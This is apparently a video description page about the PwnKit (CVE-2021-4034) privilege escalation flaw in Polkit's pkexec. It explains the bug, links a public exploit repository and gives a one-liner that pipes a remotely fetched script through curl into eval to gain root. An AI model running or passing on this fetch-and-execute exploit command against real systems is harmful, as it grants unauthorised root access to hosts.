Скачать или смотреть PwnKit (CVE-2021-4034) Local Privilege Escalation Vulnerability | One Liner Exploit | Polkit pkexec

#Pwnkit #CVE20214034 #LocalPrivilegeEscalation

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes.

Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host.

A local privilege escalation vulnerability was found on “Polkit’s pkexec” utility the CVE came out last year as
(CVE-2021-4034).

Polkit’s pkexec is a SUID-root program installed by default on every major Linux distribution it affects all versions of pkexec dating back to the first version from May 2009.

Pkexec allows an authorized user to execute commands as another user. If a username isn’t specified, the command will be executed as the administrative superuser (root), an unprivileged user can exploit this vulnerability to obtain full root privileges.

Clone the repository from https://github.com/berdav/CVE-2021-4034

One Liner Command:
You can easily exploit the system using a single script, downloadable and executable with this command:

eval "$(curl -s https://raw.githubusercontent.com/ber...)"

Hashtags
#linux #programming #coding #hacking #python #cybersecurity #technology #hacker #kalilinux #programmer #tech #computerscience #windows #ethicalhacking #java #javascript #security #hackers #coder #hack #code #infosec #software #html #computer #ethicalhacker #pentesting #webdevelope